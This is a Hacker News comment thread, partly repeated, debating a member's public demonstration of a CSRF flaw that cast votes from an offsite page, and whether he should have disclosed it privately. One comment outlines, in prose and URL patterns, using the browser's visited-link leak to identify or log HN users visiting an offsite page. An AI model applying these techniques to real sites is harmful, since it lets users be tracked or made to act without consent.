Not cool. We deliberately don't put that much effort into security, because this is a community based on trust, not a bank. And by choosing to publish this rather than e.g. simply sending me an email about it, he's inviting people to do this.
I think a lot of people are missing the point here. Sure what he did wasn't "cool" since it deceived users who are part of a community that is based on trust and responsibility. But he found a potential exploit and instead of using it irresponsibly he brought it to the attention of the community. Maybe the right thing would have been to contact PG. Maybe he takes lessons from the Windows world of bugs... If it's not made public for exploitation, it may never get fixed.
In my opinion this should be looked at as a learning experience for web developers. We need to take these issues/exploits into account when building websites. I'm pretty sure PG accounts for XSS attacking, no? If we trust each, shouldn't we trust each other enough not to post malicious code? Unfortunately it just doesn't work like that. Security by obscurity is never the answer!
As much as this was done irresponsibly, is a fix planned for this? CSRF is, by now, a widely investigated field of web application development; most of the mystery is gone. To borrow a term from The Old New Thing, it's one of the taxes everybody has to pay.
You wouldn't necessarily need someone to volunteer their username to make this work. This unfixed and ancient (2002!) browser vulnerability leaks information, via the styling of 'visited' links, about other URLs you've visited:
...is USERNAME. So another exploit -- still sneaky but not quite fraudulent, and not especially unique to HN -- would be to design an offsite page that does one or both of (1) greets HN users by name upon their visit; (2) logs which of some chosen set of HN users has visited the page.
I fell for the trickery(admittedly my mistake for trusting an unknown website) and submitted my user name, expecting to receive a graph like the page promised.
However, as pg already pointed out it was totally uncool not notifying him before making it public. I am in the support of full but responsible disclosure. So maybe he could have published it after informing pg and the issue was taken care of.
Taking it public is a fix. Now that this information is public none of us will give out our usernames to external websites, thus ending the problem. In effect Xach's could decide between emailing someone hoping they fix the problem, or just fixing it.
I found this whole event funny. I'm also amused that people reacted as negatively to this prank as middle managers at my old $MEGACORP job would.
What's really stupid about all this is that I give fellow users on this site a little bit of trust because I know that many times, they would like advice or help with their projects, or conversely, they have stumbled on something I can learn.
So I don't worry too much about giving my user name out, or entering it into other HN members' apps. I did it, and I'm not worried about it really. It's not like run4yourlives is my bank id or anything.
What bothers me about the whole thing though is that I've now had it confirmed that HN is too big to trust anymore. Whereas before, there was a sense of kinship with people here - none of whom I've ever met - I now have to worry that some of them are just losers looking to exploit my trust.
That's worse than off topic posts and low quality comments really. It's an attack on the fabric of the community, and the value of the users. It's clear now that I must treat HN as I would treat reddit or digg or any other room full of potential idiots; people who would much rather exploit trust than build it.
I don't feel like any trust was violated by xach in showing us this exploit. He clearly wasn't trying to be malicious, so I frankly don't understand all of these people who are so upset about this. It sounds like a lot of pointless whining.
Frankly, if anybody has violated our trust, it's whoever wrote this exploitable code. When I use a site, especially an open source one claimed to be written by good programmers, I expect it to be protected from well-understood exploits. And pg, as the caretaker of the code (and its likely author), needs to do some talking about how "not cool" running easily exploitable code is and take some responsibility.
Honestly, what have you lost? Nothing. The truth is that you shouldn't be trusting a bunch of people you've never met ANYWAY. Nobody's asking you to give them your address or mother's maiden name, but you wouldn't give those out if asked by a fellow member anyway. You should always be wary of sites asking for your information for whatever reason, and just because you trust some of the people on HN doesn't mean there aren't tons more on here that could possibly deceive you.
People seem to react to this like like the record companies reacted to Napster. "OH NO! IT'LL KILL US ALL! Screw changing our ancient business model, we'll just SUE 'EM!"
Instead of updating the way you think about HN (and other sites) you choose to put down the person who enlightened you and cast him out as some sort of heretic.
Hackers INVENT, hackers BREAK STUFF, and hackers BRING OUT THE UGLY! Why is Xach getting martyred for being a real hacker?
Besides, he's giving HN huge publicity. Jeff Atwood twittered about this thread.
Well, I think that a room full of idiots is an overstatement. An occasional idiot sure, but even that's beside the point - before this supposed decline of the community, you wouldn't have posted your credit card and social security numbers in the comments, no matter how much trust you placed here.
Am I wrong, or is this just saying HN is CSRF-able? There are commerce apps that are still CSRF-able. And this is a comparatively clumsy attack, since there's no trivial way to get your username blindly.
Yes, I think it's considered CSRF, but indeed it's not as bad as it could have been, since it still requires you know the username of the logged in user.
It's also nowhere near as bad as the state of the Twitter API and apps, which require a username and password. People don't think twice about providing unlimited access to their Twitter account to random websites. Hopefully the OAuth API will fix that.
@pg: I think one solution would be to reject any vote requests with a Referrer header other than news.ycombinator.com
[+] [-] pg|17 years ago|reply
[+] [-] agotterer|17 years ago|reply
In my opinion this should be looked at as a learning experience for web developers. We need to take these issues/exploits into account when building websites. I'm pretty sure PG accounts for XSS attacking, no? If we trust each, shouldn't we trust each other enough not to post malicious code? Unfortunately it just doesn't work like that. Security by obscurity is never the answer!
[+] [-] shadytrees|17 years ago|reply
[+] [-] tptacek|17 years ago|reply
[+] [-] joshu|17 years ago|reply
[+] [-] dag|17 years ago|reply
[+] [-] AndyKelley|17 years ago|reply
[+] [-] erlanger|17 years ago|reply
[+] [-] comster|17 years ago|reply
[+] [-] ericwaller|17 years ago|reply
Something to think about for your own applications
[+] [-] gojomo|17 years ago|reply
http://seclists.org/bugtraq/2002/Feb/0271.html
In many cases, the only person who will have visited all of...
http://news.ycombinator.com/threads?id=USERNAME
http://news.ycombinator.com/submitted?id=USERNAME
http://news.ycombinator.com/saved?id=USERNAME
http://news.ycombinator.com/user?id=USERNAME
...is USERNAME. So another exploit -- still sneaky but not quite fraudulent, and not especially unique to HN -- would be to design an offsite page that does one or both of (1) greets HN users by name upon their visit; (2) logs which of some chosen set of HN users has visited the page.
[+] [-] tlrobinson|17 years ago|reply
[+] [-] r11t|17 years ago|reply
However, as pg already pointed out it was totally uncool not notifying him before making it public. I am in the support of full but responsible disclosure. So maybe he could have published it after informing pg and the issue was taken care of.
[+] [-] dag|17 years ago|reply
I found this whole event funny. I'm also amused that people reacted as negatively to this prank as middle managers at my old $MEGACORP job would.
[+] [-] asdflkj|17 years ago|reply
http://www.reddit.com/r/programming/comments/67gu9/take_the_...
[+] [-] ajju|17 years ago|reply
Was that a net gain for you?
[+] [-] critic|17 years ago|reply
Edit: link http://www.reddit.com/r/programming/comments/854w0/faking_vo...
[+] [-] run4yourlives|17 years ago|reply
So I don't worry too much about giving my user name out, or entering it into other HN members' apps. I did it, and I'm not worried about it really. It's not like run4yourlives is my bank id or anything.
What bothers me about the whole thing though is that I've now had it confirmed that HN is too big to trust anymore. Whereas before, there was a sense of kinship with people here - none of whom I've ever met - I now have to worry that some of them are just losers looking to exploit my trust.
That's worse than off topic posts and low quality comments really. It's an attack on the fabric of the community, and the value of the users. It's clear now that I must treat HN as I would treat reddit or digg or any other room full of potential idiots; people who would much rather exploit trust than build it.
Sad but inevitable I suppose.
[+] [-] chairface|17 years ago|reply
Frankly, if anybody has violated our trust, it's whoever wrote this exploitable code. When I use a site, especially an open source one claimed to be written by good programmers, I expect it to be protected from well-understood exploits. And pg, as the caretaker of the code (and its likely author), needs to do some talking about how "not cool" running easily exploitable code is and take some responsibility.
[+] [-] l0gic|17 years ago|reply
People seem to react to this like like the record companies reacted to Napster. "OH NO! IT'LL KILL US ALL! Screw changing our ancient business model, we'll just SUE 'EM!"
Instead of updating the way you think about HN (and other sites) you choose to put down the person who enlightened you and cast him out as some sort of heretic.
Hackers INVENT, hackers BREAK STUFF, and hackers BRING OUT THE UGLY! Why is Xach getting martyred for being a real hacker?
Besides, he's giving HN huge publicity. Jeff Atwood twittered about this thread.
[+] [-] YuriNiyazov|17 years ago|reply
[+] [-] tptacek|17 years ago|reply
[+] [-] tlrobinson|17 years ago|reply
It's also nowhere near as bad as the state of the Twitter API and apps, which require a username and password. People don't think twice about providing unlimited access to their Twitter account to random websites. Hopefully the OAuth API will fix that.
@pg: I think one solution would be to reject any vote requests with a Referrer header other than news.ycombinator.com